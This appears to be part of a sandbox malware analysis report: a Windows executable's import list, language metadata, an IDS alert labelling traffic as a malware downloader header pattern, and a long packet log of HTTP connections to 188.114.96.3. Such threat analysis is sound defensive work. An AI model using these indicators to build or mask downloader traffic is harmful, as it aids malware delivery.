IsWindowEnabled, GetNextDlgTabItem, EndDialog, GetClassNameW, InvalidateRect, UpdateWindow, FillRect, DrawStateW, GetMenuState, GetMenuStringW, GetMenuItemID, InsertMenuW, GetMenuItemCount, GetSubMenu, RemoveMenu, MessageBoxA, GetProcessWindowStation, GetUserObjectInformationW, LoadBitmapW, SystemParametersInfoW, AdjustWindowRect, PtInRect, ReleaseDC, GetWindowRect, GetDC, GetCursorPos, CreatePopupMenu, SetActiveWindow, SetForegroundWindow, SetWindowPos, ShowWindow, RegisterWindowMessageW, GetParent, DrawIcon, GetClientRect, GetSystemMetrics, IsIconic, SetWindowLongW, GetWindowLongW, SendMessageW, AppendMenuW, GetSystemMenu, LoadIconW, PostMessageW, FindWindowW, GetClassInfoW, EnableWindow, CallWindowProcW
                                GDI32.dllSetLayout, GetLayout, SelectClipRgn, SetTextAlign, CreateFontIndirectW, GetTextExtentPoint32W, CreateDIBitmap, CreateRectRgnIndirect, GetTextMetricsW, EnumFontFamiliesW, GetTextCharsetInfo, GetMapMode, PatBlt, DPtoLP, CreateRoundRectRgn, GetBkColor, GetTextColor, GetRgnBox, CreatePolygonRgn, CreateEllipticRgn, Polyline, Ellipse, MoveToEx, CreatePalette, GetPaletteEntries, GetNearestPaletteIndex, RealizePalette, GetSystemPaletteEntries, OffsetRgn, SetPixel, Rectangle, EnumFontFamiliesExW, SetPaletteEntries, LPtoDP, GetWindowOrgEx, GetViewportOrgEx, PtInRegion, FillRgn, FrameRgn, GetBoundsRect, SelectPalette, GetTextFaceW, SetPixelV, CreateBitmap, CreatePatternBrush, Polygon, LineTo, ExtSelectClipRgn, IntersectClipRect, ExcludeClipRect, GetClipBox, SetMapMode, SetTextColor, SetROP2, SetPolyFillMode, SetBkMode, SetBkColor, RestoreDC, SaveDC, GetStockObject, CreateDCW, CopyMetaFileW, GetDeviceCaps, CombineRgn, SetRectRgn, CreateRectRgn, StretchBlt, CreateDIBSection, GetObjectW, SetDIBColorTable, DeleteDC, ScaleWindowExtEx, SetWindowExtEx, OffsetWindowOrgEx, SetWindowOrgEx, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, Escape, ExtTextOutW, TextOutW, RectVisible, PtVisible, GetPixel, BitBlt, DeleteObject, SelectObject, CreateCompatibleBitmap, CreateCompatibleDC, CreateHatchBrush, CreatePen, GetObjectType, ExtFloodFill, CreateSolidBrush, GetWindowExtEx, GetViewportExtEx
                                MSIMG32.dllTransparentBlt, AlphaBlend
                                COMDLG32.dllGetFileTitleW
                                WINSPOOL.DRVOpenPrinterW, ClosePrinter, DocumentPropertiesW
                                ADVAPI32.dllRegSetValueExW, ReportEventA, RegisterEventSourceA, CryptEnumProvidersA, CryptReleaseContext, CryptDestroyKey, CryptGetProvParam, CryptAcquireContextA, CryptGetUserKey, CryptExportKey, CryptDestroyHash, RegEnumKeyExW, RegEnumValueW, RegQueryValueW, RegEnumKeyW, RegDeleteKeyW, RegDeleteValueW, DeregisterEventSource, RegCreateKeyExW, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, CryptDecrypt, CryptCreateHash, CryptSetHashParam, CryptSignHashA
                                SHELL32.dllSHGetFileInfoW, ShellExecuteW, ShellExecuteExW, SHBrowseForFolderW, DragQueryFileW, DragFinish, SHAppBarMessage, SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHGetDesktopFolder, Shell_NotifyIconW, ShellExecuteA, CommandLineToArgvW
                                COMCTL32.dllInitCommonControlsEx, _TrackMouseEvent, ImageList_GetIconSize
                                SHLWAPI.dllPathFindExtensionW, PathFindFileNameW, PathIsUNCW, PathRemoveFileSpecW, PathStripToRootW
                                ole32.dllOleCreateMenuDescriptor, OleInitialize, StgOpenStorageOnILockBytes, StgCreateDocfileOnILockBytes, OleDestroyMenuDescriptor, OleTranslateAccelerator, IsAccelerator, OleLockRunning, OleGetClipboard, RegisterDragDrop, CoLockObjectExternal, RevokeDragDrop, CoRevokeClassObject, CoRegisterMessageFilter, ReleaseStgMedium, CoTaskMemAlloc, OleDuplicateData, CoCreateGuid, CLSIDFromProgID, CLSIDFromString, CoCreateInstance, CoDisconnectObject, CoInitialize, CoUninitialize, CoInitializeEx, CoFreeUnusedLibraries, OleUninitialize, DoDragDrop, OleFlushClipboard, OleIsCurrentClipboard, CreateILockBytesOnHGlobal, CoTaskMemFree, CreateStreamOnHGlobal, CoGetClassObject
                                OLEAUT32.dllVariantCopy, VariantClear, OleCreateFontIndirect, LoadTypeLib, VarBstrFromDate, SysStringLen, SystemTimeToVariantTime, VariantTimeToSystemTime, SafeArrayDestroy, VariantChangeType, SysFreeString, SysAllocStringLen, VariantInit, SysAllocString, DispCallFunc, LoadRegTypeLib, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetElemsize, SafeArrayCreate
                                oledlg.dllOleUIBusyW
                                gdiplus.dllGdipSetInterpolationMode, GdipCreateBitmapFromHBITMAP, GdipDrawImageRectRect, GdipDrawImageRect, GdipCloneBitmapAreaI, GdipCreateBitmapFromFile, GdipCreateBitmapFromStream, GdipGetImagePixelFormat, GdipGetImagePaletteSize, GdipGetImagePalette, GdipBitmapLockBits, GdipBitmapUnlockBits, GdipCreateBitmapFromScan0, GdipGetImageGraphicsContext, GdipDrawImageI, GdipReleaseDC, GdipDrawString, GdipSetTextRenderingHint, GdipCloneBrush, GdipDeleteBrush, GdipCreateSolidFill, GdipSetStringFormatLineAlign, GdipSetStringFormatAlign, GdipDeleteStringFormat, GdipCreateStringFormat, GdipDeleteFont, GdipCreateFontFamilyFromName, GdipDeleteFontFamily, GdipGetGenericFontFamilySansSerif, GdipCreateFont, GdipDrawImageRectI, GdipSetSmoothingMode, GdipDeleteGraphics, GdipCreateFromHDC, GdipGetImageHeight, GdipGetImageWidth, GdipDisposeImage, GdipCloneImage, GdipAlloc, GdipFree, GdiplusShutdown, GdiplusStartup, GdipLoadImageFromFile
                                dbghelp.dllSymFunctionTableAccess, SymGetModuleBase, StackWalk, MiniDumpWriteDump, SymSetOptions, SymInitialize
                                OLEACC.dllAccessibleObjectFromWindow, CreateStdAccessibleObject, LresultFromObject
                                IMM32.dllImmGetOpenStatus, ImmReleaseContext, ImmGetContext
                                WINMM.dllPlaySoundW
                                Language of compilation systemCountry where language is spokenMap
                                ChineseChina
                                EnglishUnited States
                                TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                2024-08-27T09:49:34.405364+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa34971480192.168.2.8188.114.96.3
                                TimestampSource PortDest PortSource IPDest IP
                                Aug 27, 2024 09:49:33.934366941 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:33.939178944 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:33.939281940 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:33.939544916 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:33.944271088 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.405163050 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.405210018 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.405221939 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.405236959 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.405261040 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.405273914 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.405286074 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.405297995 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.405312061 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.405318022 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.405364037 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.405400991 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.410361052 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.410378933 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.410393000 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.410430908 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.410458088 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.492815018 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.492845058 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.492856979 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.492871046 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.492885113 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.492990971 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.493024111 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.493104935 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.493154049 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.493313074 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.493326902 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.493349075 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.493360996 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.493365049 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.493376017 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.493381023 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.493411064 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.493437052 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.494091034 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.494148016 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.494194031 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.494206905 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.494224072 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.494241953 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.494247913 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.494270086 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.494296074 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.495295048 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.495310068 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.495328903 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.495342016 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.495345116 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.495357037 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.495376110 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.495384932 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.495414972 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.496239901 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.496310949 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.496485949 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.496534109 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.580440998 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.580502033 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.580516100 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.580519915 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.580543041 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.580570936 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.580579996 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.580584049 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.580595016 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.580609083 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.580611944 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.580642939 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.580658913 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.580928087 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.580991983 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.581756115 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.581804991 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.581816912 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.581819057 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.581852913 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.581883907 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.582335949 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.582346916 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.582353115 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.582357883 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.582365036 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.582475901 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.582726002 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.582739115 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.582775116 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.582806110 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.583079100 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.583118916 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.583120108 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.583132029 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.583159924 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.583178043 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.583651066 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.583663940 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.583676100 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.583712101 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.583739996 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.584382057 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.584393978 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.584404945 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.584423065 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.584446907 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.584446907 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.584475994 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.584697962 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.584712029 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.584777117 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.585083008 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.585181952 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.585192919 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.585203886 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.585222006 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.585235119 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.585249901 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.585787058 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.585798979 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.585817099 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.585827112 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.585927010 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.673171043 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.673203945 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.673217058 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.673229933 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.673244953 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.673356056 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.673361063 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.673372984 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.673386097 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.673398972 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.673404932 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.673417091 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.673496962 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.673854113 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.673887014 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.673898935 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.673935890 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.674012899 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.674021959 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.674024105 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.674038887 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.674051046 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.674118042 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.674150944 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.674221992 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.674603939 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.674623966 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.674637079 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.674685001 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.674726963 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.674738884 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.674751043 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.674763918 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.674771070 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.674870968 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.674952030 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.674963951 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.675020933 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.675745964 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.675806046 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.675817013 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.675828934 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.675919056 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.675932884 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.675945997 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.675956964 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.675968885 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.676018000 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.676071882 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.676074982 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.676084042 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.676170111 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.676527977 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.676588058 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.676599979 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.676609993 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.676647902 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.676659107 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.676676035 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.676688910 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.676698923 CEST8049714188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.676712036 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.676808119 CEST4971480192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.855912924 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.860888004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:34.860986948 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.861166000 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:34.866019964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.350728035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.353763103 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.358629942 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.455451965 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.455481052 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.455497980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.455511093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.455523968 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.455538034 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.455569983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.455576897 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.455580950 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.455593109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.455599070 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.455610991 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.455627918 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.455648899 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.456203938 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.460561037 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.460616112 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.542304993 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.542325020 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.542331934 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.542339087 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.542393923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.542407990 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.542419910 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.542557001 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.542601109 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.543040037 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.543052912 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.543065071 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.543080091 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.543102026 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.543107033 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.543114901 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.543159008 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.543900967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.543930054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.543941975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.543956995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.543962955 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.544003010 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.544455051 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.544485092 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.544497967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.544521093 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.544538021 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.544558048 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.544575930 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.545293093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.545325041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.545341015 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.565502882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.565519094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.565532923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.565783024 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.629260063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.629298925 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.629312038 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.629324913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.629513025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.629570961 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.629584074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.629630089 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.629638910 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.629642963 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.629688025 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.630387068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.630413055 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.630424023 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.630449057 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.630481958 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.630491018 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.630502939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:35.630603075 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:35.631239891 CEST8049715188.114.96.3192.168.2.8
